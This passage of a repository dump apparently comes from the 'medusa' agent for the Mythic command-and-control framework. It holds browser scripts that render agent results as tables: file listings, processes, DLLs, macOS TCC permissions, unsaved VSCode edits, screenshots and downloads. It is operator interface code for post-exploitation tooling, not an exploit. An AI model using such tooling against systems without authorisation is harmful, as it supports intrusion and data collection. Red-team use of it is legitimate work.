supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = \"Polling {} for changes every {} seconds\".format(task.args.get_arg(\"path\"), str(task.args.get_arg(\"seconds\")))\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/copy_additional_info_to_clipboard.js",
    "content": "function(elem){\n    function copyStringToClipboard(str) {\n        // Create new element\n        let el = document.createElement('textarea');\n        // Set value (string to be copied)\n        el.value = str;\n        // Set non-editable to avoid focus and move outside of view\n        el.setAttribute('readonly', '');\n        el.style = {position: 'absolute', left: '-9999px'};\n        document.body.appendChild(el);\n        // Select text inside element\n        el.select();\n        // Copy text to clipboard\n        document.execCommand('copy');\n        // Remove temporary element\n        document.body.removeChild(el);\n        alertTop(\"info\", \"Copied...\", 1);\n    }\n    var content = atob(elem.getAttribute(\"additional-info\"));\n    copyStringToClipboard(content);\n}"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/create_table.js",
    "content": "function(headers, data){\n  let output = \"<table style='overflow:scroll;white-space:nowrap;width:100%;color:white' class='table-striped border border-dark shadow table-dark table-condensed'>\";\n  output += \"<tr>\";\n  for(let i = 0; i < headers.length; i++){\n    output += \"<th style='background-color:#393485;color:white;height:40px;text-align:left;padding:0px 0px 0px 20px;width:\" + headers[i]['size'] + \"' onclick=\\\"sort_table(this)\\\">\" + headers[i]['name'].toUpperCase() + \"</th>\";\n  }\n  output += \"</tr>\";\n  for(let i = 0; i < data.length; i++){\n    output += \"<tr style='text-align:left;\" + data[i]['row-style'] + \"'>\";\n    for(let j = 0; j < headers.length; j++){\n     if(data[i]['cell-style'].hasOwnProperty(headers[j])){\n        output += \"<td style='padding:0px 0px 0px 20px;\" + data[i]['cell-style'][headers[j]['name']] + \"'>\" + data[i][headers[j]['name']] + \"</td>\";\n     }\n     else{\n        output += \"<td style='padding:0px 0px 0px 20px'>\" + data[i][headers[j]['name']] + \"</td>\";\n     }\n    }\n    output += \"</tr>\";\n  }\n  output += \"</table>\";\n  return output;\n}"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/download.js",
    "content": "function(task, responses){\n    if(task.status.includes(\"error\")){\n        const combined = responses.reduce( (prev, cur) => {\n            return prev + cur;\n        }, \"\");\n        return {'plaintext': combined};\n    }else if(task.completed){\n        try{\n            let data = JSON.parse(responses[0].replace((new RegExp(\"'\", 'g')), '\"'));\n            return {\"download\":[{\n                \"agent_file_id\": data[\"agent_file_id\"],\n                \"variant\": \"contained\",\n                \"name\": \"Download \" + task[\"display_params\"]\n            }]};\n        }catch(error){\n            const combined = responses.reduce( (prev, cur) => {\n                return prev + cur;\n            }, \"\");\n            return {'plaintext': combined};\n        }\n\n    }else if(task.status === \"processed\"){\n        if(responses.length > 0){\n            const task_data = JSON.parse(responses[0]);\n            return {\"plaintext\": \"Downloading file with \" + task_data[\"total_chunks\"] + \" total chunks...\"};\n        }\n        return {\"plaintext\": \"No data yet...\"}\n    }else{\n        // this means we shouldn't have any output\n        return {\"plaintext\": \"No response yet from agent...\"}\n    }\n}"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/download_bulk.js",
    "content": "function(task, responses){\n    if(task.status.includes(\"error\")){\n        const combined = responses.reduce( (prev, cur) => {\n            return prev + cur;\n        }, \"\");\n        return {'plaintext': combined};\n    } else if(task.completed){\n        if(responses.length === 0){\n            return {'plaintext': 'No response from agent.'};\n        }\n        // Iterative mode returns one JSON object per file, one per line.\n        // Archive mode returns a single JSON object with agent_file_id.\n        const lines = responses[0].split('\\n').filter(l => l.trim().length > 0);\n        let downloads = [];\n        let plainLines = [];\n        for(let i = 0; i < lines.length; i++){\n            try{\n                let data = JSON.parse(lines[i].replace((new RegExp(\"'\", 'g')), '\"'));\n                if(\"agent_file_id\" in data){\n                    let label = \"file_path\" in data\n                        ? \"Download \" + data[\"file_path\"]\n                        : \"Download \" + task[\"display_params\"];\n                    downloads.push({\n                        \"agent_file_id\": data[\"agent_file_id\"],\n                        \"variant\": \"contained\",\n                        \"name\": label\n                    });\n                } else {\n                    plainLines.push(lines[i]);\n                }\n            } catch(error){\n                plainLines.push(lines[i]);\n            }\n        }\n        if(downloads.length > 0){\n            let result = {\"download\": downloads};\n            if(plainLines.length > 0){\n                result[\"plaintext\"] = plainLines.join('\\n');\n            }\n            return result;\n        }\n        return {'plaintext': responses[0]};\n    } else if(task.status === \"processed\"){\n        if(responses.length > 0){\n            try{\n                const task_data = JSON.parse(responses[0]);\n                if(\"total_chunks\" in task_data){\n                    return {\"plaintext\": \"Downloading with \" + task_data[\"total_chunks\"] + \" total chunks...\"};\n                }\n            } catch(error){}\n            return {\"plaintext\": responses[0]};\n        }\n        return {\"plaintext\": \"No data yet...\"};\n    } else {\n        return {\"plaintext\": \"No response yet from agent...\"};\n    }\n}\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/file_size_to_human_readable_string.js",
    "content": "function(fileSize){\n    var thresh = 1024;\n    if(Math.abs(fileSize) < thresh) {\n        return fileSize + ' B';\n    }\n    var units = ['KB','MB','GB','TB','PB','EB','ZB','YB'];\n    var u = -1;\n    do {\n        fileSize /= thresh;\n        ++u;\n    } while(Math.abs(fileSize) >= thresh && u < units.length - 1);\n    return fileSize.toFixed(1)+' '+units[u];\n  return output;\n}"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/jobs.js",
    "content": "function(task, responses){\n  if(task.status.includes(\"error\")){\n      const combined = responses.reduce( (prev, cur) => {\n          return prev + cur;\n      }, \"\");\n      return {'plaintext': combined};\n  }else if(task.completed){\n      if(responses.length > 0){\n          try{\n                  let data = JSON.parse(responses[0].replace((new RegExp(\"'\", 'g')), '\"'));\n                  let entries = data[\"jobs\"];\n                  let output_table = [];\n                  for(let i = 0; i < entries.length; i++){\n                      output_table.push({\n                          \"command\":{\"plaintext\": entries[i][0]},\n                          \"task_id\": {\"plaintext\": entries[i][1], \"copyIcon\": true},\n                          \"rowStyle\": {\"backgroundColor\": \"mediumpurple\"}\n                      })\n                  }\n                  return {\n                      \"table\": [\n                          {\n                              \"headers\": [\n                                  {\"plaintext\": \"command\", \"type\": \"string\", \"fillWidth\": true},\n                                  {\"plaintext\": \"task_id\", \"type\": \"string\", \"fillWidth\": true},\n                              ],\n                              \"rows\": output_table,\n                              \"title\": \"Running Jobs\"\n                          }\n                      ]\n                  }\n          }catch(error){\n                  console.log(error);\n                  const combined = responses.reduce( (prev, cur) => {\n                      return prev + cur;\n                  }, \"\");\n                  return {'plaintext': combined};\n          }\n      }else{\n          return {\"plaintext\": \"No output from command\"};\n      }\n  }else{\n      return {\"plaintext\": \"No data to display...\"};\n  }\n}"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/list_apps.js",
    "content": "function(task, responses){\n  if(task.status.includes(\"error\")){\n      const combined = responses.reduce( (prev, cur) => {\n          return prev + cur;\n      }, \"\");\n      return {'plaintext': combined};\n  }else if(task.completed){\n      if(responses.length == 1){\n          try{\n                  let data = JSON.parse(responses[0].replace((new RegExp(\"'\", 'g')), '\"'));\n                  let entries = data[\"apps\"];\n                  let output_table = [];\n                  for(let i = 0; i < entries.length; i++){\n                      output_table.push({\n                          \"PID\":{\"plaintext\": entries[i][\"pid\"]},\n                          \"Name\":{\"plaintext\": entries[i][\"name\"]},\n                          \"Executable URL\":{\"plaintext\": entries[i][\"exec_url\"], \"copyIcon\": true},\n                          \"rowStyle\": {}\n                      })\n                  }\n                  return {\n                      \"table\": [\n                          {\n                              \"headers\": [\n                                  {\"plaintext\": \"PID\", \"type\": \"string\"},\n                                  {\"plaintext\": \"Name\", \"type\": \"string\",\"width\": 180},\n                                  {\"plaintext\": \"Executable URL\", \"type\": \"string\"},\n                              ],\n                              \"rows\": output_table,\n                              \"title\": \"Apps\"\n                          }\n                      ]\n                  }\n          }catch(error){\n                  console.log(error);\n                  const combined = responses.reduce( (prev, cur) => {\n                      return prev + cur;\n                  }, \"\");\n                  return {'plaintext': combined};\n          }\n      }else{\n          return {\"plaintext\": \"No output from command\"};\n      }\n  }else{\n      return {\"plaintext\": \"No data to display...\"};\n  }\n}"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/list_dlls.js",
    "content": "function(task, responses){\n  if(task.status.includes(\"error\")){\n      const combined = responses.reduce( (prev, cur) => {\n          return prev + cur;\n      }, \"\");\n      return {'plaintext': combined};\n  }else if(task.completed){\n      if(responses.length == 1){\n          try{\n                  let data = JSON.parse(responses[0].replace((new RegExp(\"'\", 'g')), '\"'));\n                  let entries = data[\"dlls\"];\n                  let output_table = [];\n                  for(let i = 0; i < entries.length; i++){\n                      output_table.push({\n                          \"DLL\":{\"plaintext\": entries[i], \"copyIcon\": true},\n                          \"rowStyle\": {}\n                      })\n                  }\n                  return {\n                      \"table\": [\n                          {\n                              \"headers\": [\n                                  {\"plaintext\": \"DLL\", \"type\": \"string\"},\n                              ],\n                              \"rows\": output_table,\n                              \"title\": \"Loaded DLLs\"\n                          }\n                      ]\n                  }\n          }catch(error){\n                  console.log(error);\n                  const combined = responses.reduce( (prev, cur) => {\n                      return prev + cur;\n                  }, \"\");\n                  return {'plaintext': combined};\n          }\n      }else{\n          return {\"plaintext\": \"No output from command\"};\n      }\n  }else{\n      return {\"plaintext\": \"No data to display...\"};\n  }\n}"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/ls.js",
    "content": "function(task, response){\n  if(task.status.includes(\"error\")){\n    const combined = response.reduce( (prev, cur) => {\n        return prev + cur;\n    }, \"\");\n    return {'plaintext': combined};\n  }else if(task.completed && response.length > 0){\n\n    // tables styles\n    let folder = {\n      backgroundColor: \"mediumpurple\",\n      color: \"white\"\n    };\n    let file = {};\n\n    var archiveFormats = [\".a\",\".ar\",\".cpio\",\".shar\",\".LBR\",\".lbr\",\".mar\",\".sbx\",\".tar\",\".bz2\",\".F\",\".gz\",\".lz\",\".lz4\",\".lzma\",\".lzo\",\".rz\",\".sfark\",\".sz\",\".?Q?\",\".?Z?\",\".xz\",\".z\",\".Z\",\".zst\",\".??\",\".7z\",\".s7z\",\".ace\",\".afa\",\".alz\",\".apk\",\".arc\",\".arc\",\".arj\",\".b1\",\".b6z\",\".ba\",\".bh\",\".cab\",\".car\",\".cfs\",\".cpt\",\".dar\",\".dd\",\".dgc\",\".ear\",\".gca\",\".ha\",\".hki\",\".ice\",\".jar\",\".kgb\",\".lzh\",\".lzx\",\".pak\",\".pak\",\".parti\",\".paq6\",\".pea\",\".pim\",\".pit\",\".qda\",\".rar\",\".rk\",\".sda\",\".sea\",\".sen\",\".sfx\",\".shk\",\".sit\",\".sitx\",\".sqx\",\".tar\",\".tbz2\",\".uc\",\".uca\",\".uha\",\".war\",\".wim\",\".xar\",\".xp3\",\".yz1\",\".zip\",\".zoo\",\".zpaq\",\".zz\",\".ecc\",\".ecsbx\",\".par\",\".par2\",\".rev\"];\n    var diskImages = [\".dmg\", \".iso\", \".vmdk\"];\n    var wordDocs = [\".doc\", \".docx\", \".dotm\", \".dot\", \".wbk\", \".docm\", \".dotx\", \".docb\"];\n    var excelDocs = [\".xls\", \".xlsx\", \".xlsm\", \".xltx\", \".xltm\", \".xlmx\", \".xlmt\"];\n    var powerPoint = [\".ppt\", \".pptx\", \".potx\", \".ppsx\", \".thmx\", \".pot\", \".pps\"];\n    var pdfExt = [\".pdf\"];\n    var dbExt = [\".db\", \".sql\", \".psql\"];\n    var keyFiles = [\".pem\", \".ppk\"];\n    var scriptFiles = [\".config\", \".ps1\", \".psm1\", \".psd1\", \".vbs\", \".js\", \".py\", \".pl\", \".rb\", \".go\", \".xml\", \".html\", \".css\", \".sh\", \".bash\", \".yaml\", \".yml\"];\n    // var uniqueName = task.id + \"_additional_permission_info_modal\";\n    \n    let rows = [];\n    let data = \"\";\n\n    try{\n      data = JSON.parse(response[0]);\n    }catch(error){\n      const combined = response.reduce( (prev, cur) => {\n          return prev + cur;\n      }, \"\");\n      return {'plaintext': combined};\n    }\n    \n    let headers = [\n      {\"plaintext\": \"name\", \"type\": \"string\", \"fillWidth\": true},\n      {\"plaintext\": \"size\", \"type\": \"size\", \"width\": 185},\n      {\"plaintext\": \"last_accessed\", \"type\": \"string\", \"width\": 285},\n      {\"plaintext\": \"last_modified\", \"type\": \"string\", \"width\": 285},\n      {\"plaintext\": \"actions\", \"type\": \"button\", \"width\": 90, \"disableSort\": true},\n    ];\n\n    \n\n    for(let i = 0; i < data[\"files\"].length; i++){\n      let ls_path = \"\";\n      let sep = data[\"parent_path\"].includes(\"/\") ? \"/\": \"\\\\\";\n\n      if(data[\"parent_path\"] === \"/\"){\n          ls_path = data[\"parent_path\"] + data[\"name\"] + sep + data[\"files\"][i][\"name\"];\n      }else{\n          ls_path = data[\"parent_path\"] + sep + data[\"name\"] + sep + data[\"files\"][i][\"name\"];\n      }\n      \n      var icon = \"\";\n      if (data[\"files\"][i][\"is_file\"] ===  true) {\n        var fileExt = \".\" + data[\"files\"][i]['name'].split(\".\").slice(-1)[0].toLowerCase();\n        \n        if (archiveFormats.includes(fileExt)) {\n          icon = 'archive/zip';\n        } else if (diskImages.includes(fileExt)) {\n          icon = 'diskimage';\n        } else if (wordDocs.includes(fileExt)) {\n          icon = 'word';\n        } else if (excelDocs.includes(fileExt)){\n          icon = 'excel';\n        } else if (powerPoint.includes(fileExt)) {\n          icon = 'powerpoint';\n        } else if (pdfExt.includes(fileExt)){\n          icon = 'pdf/adobe';\n        } else if (dbExt.includes(fileExt)) {\n          icon = 'database';\n        } else if (keyFiles.includes(fileExt)) {\n          icon = 'key';\n        } else if (scriptFiles.includes(fileExt)) {\n          icon = 'code/source';\n        } else {\n          icon = 'code/source';\n        }\n      } else {\n        icon = 'closedFolder';\n      }\n\n      let row = {\n          \"rowStyle\": data[\"files\"][i][\"is_file\"] ? file:  folder,\n          \"name\": {\n            \"plaintext\": data[\"files\"][i][\"name\"],\n            \"startIcon\": icon\n          },\n          \"size\": {\"plaintext\": String(data[\"files\"][i][\"size\"])},\n          \"last_accessed\": {\"plaintext\": String(new Date(data[\"files\"][i][\"access_time\"]))},\n          \"last_modified\": {\"plaintext\": String(new Date(data[\"files\"][i][\"modify_time\"]))},\n          \"actions\": {\"button\": {\n          \"name\": \"Actions\",\n          \"type\": \"menu\",\n          \"value\": [\n                  {\n                      \"name\": \"View XATTRs\",\n                      \"type\": \"dictionary\",\n                      \"value\": data[\"files\"][i][\"permissions\"],\n                      \"leftColumnTitle\": \"XATTR\",\n                      \"rightColumnTitle\": \"Values\",\n                      \"title\": \"Viewing XATTRs\"\n                  },\n                  {\n                      \"name\": \"LS Path\",\n                      \"type\": \"task\",\n                      \"ui_feature\": \"file_browser:list\",\n                      \"parameters\": ls_path\n                  },\n                  {\n                    \"name\": \"Download File\",\n                    \"type\": \"task\",\n                    \"disabled\": !data[\"files\"][i][\"is_file\"],\n                    \"ui_feature\": \"file_browser:download\",\n                    \"parameters\": ls_path\n                  }\n              ]\n          }}\n      };\n      rows.push(row);\n    }\n\n    return {\"table\":[{\n      \"headers\": headers,\n      \"rows\": rows,\n      \"title\": \"File Listing Data\"\n    }]};\n\n  }\n  else if(task.status === \"processed\"){\n    // this means we're still downloading\n    return {\"plaintext\": \"Only have partial data so far...\"}\n  }else{\n    // this means we shouldn't have any output\n    return {\"plaintext\": \"Not response yet from agent...\"}\n}\n  \n\n}"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/ps.js",
    "content": "function(task, response){\n    if(task.status.includes(\"error\")){\n        const combined = response.reduce( (prev, cur) => {\n            return prev + cur;\n        }, \"\");\n        return {'plaintext': combined};\n    }else if(task.completed){\n        if(response.length > 0){\n            try{\n                    let data = JSON.parse(response[0]);\n                    let entries = data[\"processes\"];\n                    let output_table = [];\n  \n                    for(let i = 0; i < entries.length; i++){\n                      output_table.push({\n                            \"UID\":{\"plaintext\":  (!\"user_id\" in entries[i]) ? ' ' : entries[i]['user_id'] },\n                            \"PID\":{\"plaintext\": String(entries[i][\"process_id\"]) },\n                            \"PPID\":{\"plaintext\": ((!\"parent_process_id\" in entries[i]) ? ' ' : entries[i]['parent_process_id']) },\n                            \"Name\":{\"plaintext\": ((!\"name\" in entries[i]) ? ' ' : entries[i]['name']) },\n                            \"Arch\":{\"plaintext\": ((!\"architecture\" in entries[i]) ? ' ' : entries[i]['architecture']) },\n                            \"Bin Path\":{\"plaintext\": ((!\"bin_path\" in entries[i]) ? ' ' : entries[i]['bin_path']) },\n                            \"actions\": {\"button\": {\n                              \"name\": \"Actions\",\n                              \"type\": \"menu\",\n                              \"value\": [\n                                      {\n                                          \"name\": \"List DLLs\",\n                                          \"type\": \"task\",\n                                          \"ui_feature\": \"process_dlls:list\",\n                                          \"parameters\": { \"process_id\": entries[i][\"process_id\"] }\n                                      },\n                                  ]\n                              }},\n                            \"rowStyle\": {}\n                        })\n                    }\n                    return {\n                        \"table\": [\n                            {\n                                \"headers\": [\n                                  {\"plaintext\": \"UID\", \"type\": \"string\",\"width\": 90,\"disableSort\": true},\n                                  {\"plaintext\": \"PID\", \"type\": \"string\",\"width\": 90,\"disableSort\": true},\n                                  {\"plaintext\": \"PPID\", \"type\": \"string\",\"width\": 90,\"disableSort\": true},\n                                  {\"plaintext\": \"Name\", \"type\": \"string\", \"fillWidth\": true},\n                                  {\"plaintext\": \"Arch\", \"type\": \"string\", \"width\": 70},\n                                  {\"plaintext\": \"Bin Path\", \"type\": \"string\", \"fillWidth\": true},\n                                  {\"plaintext\": \"actions\", \"type\": \"button\", \"width\": 90, \"disableSort\": true},\n                                  ],\n                                \"rows\": output_table,\n                                \"title\": \"Running processes\"\n                            }\n                        ]\n                    }\n            }catch(error){\n                    console.log(error);\n                    const combined = response.reduce( (prev, cur) => {\n                        return prev + cur;\n                    }, \"\");\n                    return {'plaintext': combined};\n            }\n        }else{\n            return {\"plaintext\": \"No output from command\"};\n        }\n    }else{\n        return {\"plaintext\": \"No data to display...\"};\n    }\n  }"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/ps_full.js",
    "content": "function(task, response){\n    if(task.status.includes(\"error\")){\n        const combined = response.reduce( (prev, cur) => {\n            return prev + cur;\n        }, \"\");\n        return {'plaintext': combined};\n    }else if(task.completed){\n        if(response.length > 0){\n            try{\n                    let data = JSON.parse(response[0]);\n                    let entries = data[\"processes\"];\n                    let output_table = [];\n  \n                    for(let i = 0; i < entries.length; i++){\n                      \n                      output_table.push({\n                            \"PID\":{\"plaintext\": String(entries[i][\"process_id\"]), \"copyIcon\": true},\n                            \"PPID\":{\"plaintext\": ((!entries[i].hasOwnProperty(\"parent_process_id\")) ? ' ' : String(entries[i]['parent_process_id'])) },\n                            \"Name\":{\"plaintext\": ((!\"name\" in entries[i]) ? ' ' : entries[i]['name']) },\n                            \"Arch\":{\"plaintext\": ((!\"architecture\" in entries[i]) ? ' ' : entries[i]['architecture']) },\n                            \"Integrity Level\":{\"plaintext\": ((!entries[i].hasOwnProperty(\"integrity_level\")) ? ' ' : String(entries[i]['integrity_level'])) },\n                            \"Command Line\":{\"plaintext\": ((!\"command_line\" in entries[i]) ? ' ' : entries[i]['command_line']) },\n                            \"Bin Path\":{\"plaintext\": ((!\"bin_path\" in entries[i]) ? ' ' : entries[i]['bin_path']), \"copyIcon\": true},\n                            \"actions\": {\"button\": {\n                              \"name\": \"Actions\",\n                              \"type\": \"menu\",\n                              \"value\": [\n                                      {\n                                          \"name\": \"List DLLs\",\n                                          \"type\": \"task\",\n                                          \"ui_feature\": \"process_dlls:list\",\n                                          \"parameters\": { \"process_id\": String(entries[i][\"process_id\"]) }\n                                      },\n                                      {\n                                        \"name\": \"View Details\",\n                                        \"type\": \"dictionary\",\n                                        \"value\": entries[i],\n                                        \"leftColumnTitle\": \"Field\",\n                                        \"rightColumnTitle\": \"Value\",\n                                        \"title\": \"Viewing All Data\"\n                                    },\n                                  ]\n                              }},\n                            \"rowStyle\": {}\n                        })\n                    }\n                    return {\n                        \"table\": [\n                            {\n                                \"headers\": [\n                                    {\"plaintext\": \"PID\", \"type\": \"string\",\"width\": 90,\"disableSort\": true},\n                                    {\"plaintext\": \"PPID\", \"type\": \"string\", \"width\": 90,\"disableSort\": true},\n                                    {\"plaintext\": \"Name\", \"type\": \"string\", \"fillWidth\": true},\n                                    {\"plaintext\": \"Arch\", \"type\": \"string\", \"width\": 70},\n                                    {\"plaintext\": \"Integrity Level\", \"type\": \"string\", \"width\": 70},\n                                    {\"plaintext\": \"Command Line\", \"type\": \"string\", \"fillWidth\": true},\n                                    {\"plaintext\": \"Bin Path\", \"type\": \"string\", \"fillWidth\": true},\n                                    {\"plaintext\": \"actions\", \"type\": \"button\", \"width\": 90, \"disableSort\": true},\n                                  ],\n                                \"rows\": output_table,\n                                \"title\": \"Running processes\"\n                            }\n                        ]\n                    }\n            }catch(error){\n                    console.log(error);\n                    const combined = response.reduce( (prev, cur) => {\n                        return prev + cur;\n                    }, \"\");\n                    return {'plaintext': combined};\n            }\n        }else{\n            return {\"plaintext\": \"No output from command\"};\n        }\n    }else{\n        return {\"plaintext\": \"No data to display...\"};\n    }\n  }"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/screenshot.js",
    "content": "function(task, responses){\n    if(task.status.includes(\"error\")){\n        const combined = responses.reduce( (prev, cur) => {\n            return prev + cur;\n        }, \"\");\n        return {'plaintext': combined};\n    }else if(task.completed){\n        if(responses.length > 0){\n            let data = JSON.parse(responses[0].replace((new RegExp(\"'\", 'g')), '\"'));\n            return {\"screenshot\":[{\n                \"agent_file_id\": data[\"file_id\"],\n                \"variant\": \"contained\",\n                \"name\": \"View Screenshot\"\n            }]};\n        }else{\n            return {\"plaintext\": \"No data to display...\"}\n        }\n\n    }else if(task.status === \"processed\"){\n        // this means we're still downloading\n        if(responses.length > 0){\n            let data = JSON.parse(responses[0]);\n            return {\"screenshot\":[{\n                \"agent_file_id\": data[\"file_id\"],\n                \"variant\": \"contained\",\n                \"name\": \"View Partial Screenshot\"\n            }]};\n        }\n        return {\"plaintext\": \"No data yet...\"}\n    }else{\n        // this means we shouldn't have any output\n        return {\"plaintext\": \"Not response yet from agent...\"}\n    }\n}"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/tcc.js",
    "content": "function(task, responses){\n  if(task.status.includes(\"error\")){\n      const combined = responses.reduce( (prev, cur) => {\n          return prev + cur;\n      }, \"\");\n      return {'plaintext': combined};\n  }else if(task.completed){\n      if(responses.length == 1){\n          var auth_values = [\n            \"Access Denied\", \n            \"Unknown\",\n            \"Allowed\",\n            \"Limited\"\n          ];\n      \n          var auth_reason = [\n            \"Error\",\n            \"User Consent\",\n            \"User Set\",\n            \"System Set\",\n            \"Service Policy\",\n            \"MDM Policy\",\n            \"Override Policy\",\n            \"Missing usage string\",\n            \"Prompt Timeout\",\n            \"Preflight Unknown\",\n            \"Entitled\",\n            \"App Type Policy\",\n          ];\n      \n          var client_type = [\n            \"Bundle Identifier\",\n            \"Absolute Path\"\n          ];\n\n          try{\n                  let data = JSON.parse(responses[0].replace((new RegExp(\"'\", 'g')), '\"'));\n                  let entries = data[\"tcc\"];\n                  let output_table = [];\n                  for(let i = 0; i < entries.length; i++){\n                      \n                      let clienttype = client_type[entries[i]['client_type']];\n                      let authval = auth_values[entries[i]['auth_value']];\n                      let authres = auth_reason[entries[i]['auth_reason']];\n\n                      output_table.push({\n                          \"Client\":{\"plaintext\": entries[i][\"client\"]},\n                          \"Service\":{\"plaintext\": entries[i][\"service\"]},\n                          \"Client Type\":  { \"plaintext\": clienttype },\n                          \"Auth Value\":  { \"plaintext\": authval },\n                          \"Auth Reason\":  { \"plaintext\": authres },\n                          \"Last Modified\": { \"plaintext\": new Date(entries[i]['last_modified'] * 1000).toString() },\n                          \"actions\": {\"button\": {\n                            \"name\": \"Actions\",\n                            \"type\": \"menu\",\n                            \"value\": [\n                                    {\n                                        \"name\": \"View All Data\",\n                                        \"type\": \"dictionary\",\n                                        \"value\": entries[i],\n                                        \"leftColumnTitle\": \"Field\",\n                                        \"rightColumnTitle\": \"Value\",\n                                        \"title\": \"Viewing All Data\"\n                                    },\n                                ]\n                            }},\n                          \"rowStyle\": {}\n                      })\n                  }\n                  return {\n                      \"table\": [\n                          {\n                              \"headers\": [\n                                  {\"plaintext\": \"Client\", \"type\": \"string\", \"fillWidth\": true},\n                                  {\"plaintext\": \"Service\", \"type\": \"string\", \"fillWidth\": true},\n                                  {\"plaintext\": \"Client Type\", \"type\": \"string\", \"width\": 160},\n                                  {\"plaintext\": \"Auth Value\", \"type\": \"string\", \"width\": 130},\n                                  {\"plaintext\": \"Auth Reason\", \"type\": \"string\", \"width\": 135},\n                                  {\"plaintext\": \"Last Modified\", \"type\": \"string\", \"width\": 285},\n                                  {\"plaintext\": \"actions\", \"type\": \"button\", \"width\": 90, \"disableSort\": true},\n                              ],\n                              \"rows\": output_table,\n                              \"title\": \"TCC\"\n                          }\n                      ]\n                  }\n          }catch(error){\n                  console.log(error);\n                  const combined = responses.reduce( (prev, cur) => {\n                      return prev + cur;\n                  }, \"\");\n                  return {'plaintext': combined};\n          }\n      }else{\n          return {\"plaintext\": \"No output from command\"};\n      }\n  }else{\n      return {\"plaintext\": \"No data to display...\"};\n  }\n}"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/vscode_edits.js",
    "content": "function(task, responses){\n  if(task.status.includes(\"error\")){\n      const combined = responses.reduce( (prev, cur) => {\n          return prev + cur;\n      }, \"\");\n      return {'plaintext': combined};\n  }else if(task.completed){\n      if(responses.length == 1){\n          try{\n\n            let folder = {\n                backgroundColor: \"mediumpurple\",\n                color: \"white\"\n              };\n            let file = {};\n\n            let data = JSON.parse(responses[0].replace((new RegExp(\"'\", 'g')), '\"'));\n            let entries = data[\"edits\"];\n            let output_table = [];\n            \n            for(let i = 0; i < entries.length; i++){\n\n                output_table.push({\n                    \"Backup File\":{ \"plaintext\": entries[i][\"backup\"], \"copyIcon\": true },\n                    \"Original File\":{ \"plaintext\": entries[i][\"original\"] },\n                    \"Size\":{ \"plaintext\": entries[i][\"size\"] },\n                    \"Modified Time\":{ \"plaintext\": entries[i][\"mtime\"] },\n                    \"Created Time\":{ \"plaintext\": entries[i][\"ctime\"] },\n                    \"Type\":{ \"plaintext\": entries[i][\"type\"] },\n                    \"rowStyle\": {},\n                })\n            }\n            return {\n                \"table\": [\n                    {\n                        \"headers\": [\n                            {\"plaintext\": \"Backup File\", \"type\": \"string\", \"fillWidth\": true},\n                            {\"plaintext\": \"Original File\", \"type\": \"string\", \"fillWidth\": true},\n                            {\"plaintext\": \"Size\", \"type\": \"string\", \"width\": 80},\n                            {\"plaintext\": \"Modified Time\", \"type\": \"string\", \"width\": 200},\n                            {\"plaintext\": \"Created Time\", \"type\": \"string\", \"width\": 200},\n                            {\"plaintext\": \"Type\", \"type\": \"string\", \"width\": 80},\n                        ],\n                        \"rows\": output_table,\n                        \"title\": \"Unsaved VSCode Edits\"\n                    }\n                ]\n            }\n          }catch(error){\n                  console.log(error);\n                  const combined = responses.reduce( (prev, cur) => {\n                      return prev + cur;\n                  }, \"\");\n                  return {'plaintext': combined};\n          }\n      }else{\n          return {\"plaintext\": \"No output from command\"};\n      }\n  }else{\n      return {\"plaintext\": \"No data to display...\"};\n  }\n}"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/vscode_recent.js",
    "content": "function(task, responses){\n  if(task.status.includes(\"error\")){\n      const combined = responses.reduce( (prev, cur) => {\n          return prev + cur;\n      }, \"\");\n      return {'plaintext': combined};\n  }else if(task.completed){\n      if(responses.length == 1){\n          try{\n\n            let folder = {\n                backgroundColor: \"mediumpurple\",\n                color: \"white\"\n              };\n            let file = {};\n\n            let data = JSON.parse(responses[0].replace((new RegExp(\"'\", 'g')), '\"'));\n            let entries = data[\"recents\"];\n            let output_table = [];\n            \n            for(let i = 0; i < entries.length; i++){\n\n                var icon = \"\";\n                var rs = {};\n\n                if (entries[i][\"type\"] == \"folder\") {\n                    icon = 'closedFolder';\n                    rs = folder;\n                } else {\n                    icon = 'code/source';\n                    rs = file;\n                }\n\n                \n\n                output_table.push({\n                    \"Name\":{\n                        \"plaintext\": entries[i][\"path\"],\n                        \"startIcon\": icon\n                    },\n                    \"rowStyle\": rs,\n                })\n            }\n            return {\n                \"table\": [\n                    {\n                        \"headers\": [\n                            {\"plaintext\": \"Name\", \"type\": \"string\", \"fillWidth\": true},\n                        ],\n                        \"rows\": output_table,\n                        \"title\": \"Recent VSCode Files\"\n                    }\n                ]\n            }\n          }catch(error){\n                  console.log(error);\n                  const combined = responses.reduce( (prev, cur) => {\n                      return prev + cur;\n                  }, \"\");\n                  return {'plaintext': combined};\n          }\n      }else{\n          return {\"plaintext\": \"No output from command\"};\n      }\n  }else{\n      return {\"plaintext\": \"No data to display...\"};\n  }\n}"
  },
  {
    "path": "Payload_Type/medusa/rabbitmq_config.json",
